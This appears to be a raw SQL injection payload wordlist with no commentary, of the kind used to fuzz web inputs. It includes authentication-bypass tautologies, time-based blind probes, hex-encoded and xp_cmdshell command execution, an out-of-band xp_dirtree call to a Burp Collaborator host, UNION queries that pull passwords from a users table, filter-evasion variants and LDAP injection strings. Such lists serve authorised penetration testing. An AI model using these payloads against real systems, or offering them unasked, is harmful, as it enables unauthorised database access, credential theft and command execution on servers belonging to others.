';declare @q varchar(99);set @q='\\4fkxoc5km935m5n0dqqu3vvk5bb1zq.burpcollaborator.net/random'; exec master.dbo.xp_dirtree @q;-- 
-sleep(5)
-benchmark(1000000000,1-1)
' AND user() LIKE ‘%’;--
' AND (database()) LIKE ‘%’;--
' AND (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 1 OFFSET 1") LIKE '%’;--
' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='users' LIMIT 1 OFFSET 1) LIKE '%’;--
' AND (SELECT password FROM users LIMIT 1 OFFSET 0) LIKE '%’;--
"or "a"="a
')or('a'='a
or 1=1--
'or 1=1--
a'or' 1=1--
"or 1=1--
'or'a'='a
"or"="a'='a
'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 1=1
'OR 1=1
"or 1=1
'xor
'or 1=1/*
1'or'1'='1
'
a' or 1=1--
"a"" or 1=1--"
 or a = a
a' or 'a' = 'a
1 or 1=1
a' waitfor delay '0:0:10'--
1 waitfor delay '0:0:10'--
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
a'
?
' or 1=1
ý or 1=1 --
x' AND userid IS NULL; --
x' AND email IS NULL; --
anything' OR 'x'='x
x' AND 1=(SELECT COUNT(*) FROM tabname); --
x' AND members.email IS NULL; --
x' OR full_name LIKE '%Bob%
23 OR 1=1
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
'%20or%20''='
'%20or%20'x'='x
%20or%20x=x
')%20or%20('x'='x
0 or 1=1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
 or 0=0 #"
or 0=0 #
' or 1=1--
" or 1=1--
' or '1'='1'--
' or 1 --'
or%201=1
or%201=1 --
' or 1=1 or ''='
 or 1=1 or ""=
' or a=a--
 or a=a
') or ('a'='a
) or (a=a
hi or a=a
hi or 1=1 --"
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
"hi"") or (""a""=""a"
'hi' or 'x'='x';
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
exec xp
exec sp
'; exec master..xp_cmdshell
'; exec xp_regread
t'exec master..xp_cmdshell 'nslookup www.google.com'--
--sp_password
\x27UNION SELECT
' UNION SELECT
' UNION ALL SELECT
' or (EXISTS)
' (select top 1
'||UTL_HTTP.REQUEST
1;SELECT%20*
to_timestamp_tz
tz_offset
<>"'%;)(&+
'%20or%201=1
%27%20or%201=1
%20$(sleep%2050)
%20'sleep%2050'
char%4039%41%2b%40SELECT
&apos;%20OR
'sqlattempt1
(sqlattempt2)
|
%7C
*|
%2A%7C
*(|(mail=*))
%2A%28%7C%28mail%3D%2A%29%29
*(|(objectclass=*))
%2A%28%7C%28objectclass%3D%2A%29%29
(
%28
)
%29
&
%26
!
%21
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
a' or 3=3--
"a"" or 3=3--"
' or 3=3
ý or 3=3 --
"
#
-
--
' --
--';
' ;
= '
= ;
= --
\x23
\x27
\x3D \x3B'
\x3D \x27
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
';shutdown--
' or 'x'='x
" or "x"="x
') or ('x'='x
" or 0=0 #
"' or 1 --'"
" or 1=1 or ""="
" or "a"="a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi") or ("a"="a
&lt;&gt;&quot;'%;)(&amp;+
' and '' like '
' AnD '' like '
' or '' like '
' and '' like '%
' aND '' like '%
' and '' like ''--
' and 2>1--
' and 2>3--
') and ('x'='x
) and (1=1
¡® or 1=1 --
¡® or 3=3 --
1 or 1=1 and 1=1
1 || 1=1 1&& 1=1
';declare @q varchar(99);set @q='\\4fkxoc5km935m5n0dqqu3vvk5bb1zq.burpcollaborator.net/random'; exec master.dbo.xp_dirtree @q;-- 
' AND user() LIKE ‘%’;--
' AND (database()) LIKE ‘%’;--
' AND (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 1 OFFSET 1") LIKE '%’;--
' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='users' LIMIT 1 OFFSET 1) LIKE '%’;--
' AND (SELECT password FROM users LIMIT 1 OFFSET 0) LIKE '%’;--
-sleep(5)
-benchmark(1000000000,1-1)
|@pwd:=(select username from users where id=4)/*ddd*/union/*ddd*/select null,@pwd
'|@pwd:=(select user())/**/union/**/select 1,@pwd,3 --+
'or+(1)sounds/**/like"1"--%a0-
'and(true)like(false)union(select(pass)from(users))#
'union [all|distinct] select pass from users#
'union%a0select pass from users#
'union/*!select*/pass from users#
'union/*&sort=*/select pass from users-- -
'and(select pass from users where id=1)='a
'and(select pass from users group by id having id=1)='a
'and length((select pass from users having substr(pass,1,1)='a'))
and{`version`length((select/*!50000schema_name*/from/*!50000information_schema.schemata*/limit 0,1))>0}
''-(ascii(mid(database/**/()from-1))<100)-'' 
union  /*!distinctrow/*!(select~1,2,3)*/ %23
/*!union/*!all/**//*!select*/~1,2,3--+
--+/*%0aunion select 1,2,3 %0a--+*/
--+/*%0aunion select 1,2,3 %0a%23*/
/*&id=0 union select 1,2,3%23*/
-"/*" union select 1,2,3 "*/"
-'/*' union select 1,2,3 '*/'
-'/*' union select 1,2,3 %23*/
-'/*' union select 1,2,3 --+*/
union /*!44579select*/ 1,2,3%23
union /*!01344select*/ 1,2,3%23
union /*!50445select*/ 1,2,3%23
’ /*and @@version>0 and ’1 ‘=’1′*/–
'and%0a@@version>0--
'and   user>--
' union se%lect user fr%om username
\u0031\u0020\u0075\u006e\u0069\u006f\u006e\u0020\u0073\u0065\u006c\u0065\u0063\u0074\u0020\u0075\u0073\u0065\u0072\u002c\u0070\u0061\u0073\u0073\u0077\u006f\u0072\u0064\u0020\u0066\u0072\u006f\u006d\u0020\u0061\u0064\u006d\u0069\u006e
/*!uNIOn*/ /*!SelECt*/ 1,2,3,4
UNIunionON SELselectECT 1,2,3,4
%55nION/**/%53ElecT 1,2,3,4
and+(select1)=(Select 0xAA[..(add about 1000 “A”)..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4
/*!u%6eion*/ /*!se%6cect*/ 1,2,3,4
+(uNioN)+(sElECt)….-15+(uNioN+SeleCT)+…-15+(UnI)(oN)+(SeL)(ecT)+….-15+union (select 1,2,3,4…)
@a:=(select @b:=`table_name`from{a information_schema.`TABLES` }limit 0,1)union select '1',@a
and/**/2`/unION/ select 1,2,3
+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))
mid(user() from 1 for 1)
substr(user() from 1 for 1)
select substr(user()from -1) from users ;
select ascii(substr(user() from 1 for 1)) < 150;
union(select%0aall{x users}from{x ddd})
union(select%0adistinct{x users}from{x ddd})
union(select%0adistinctrow{x users}from{x ddd})
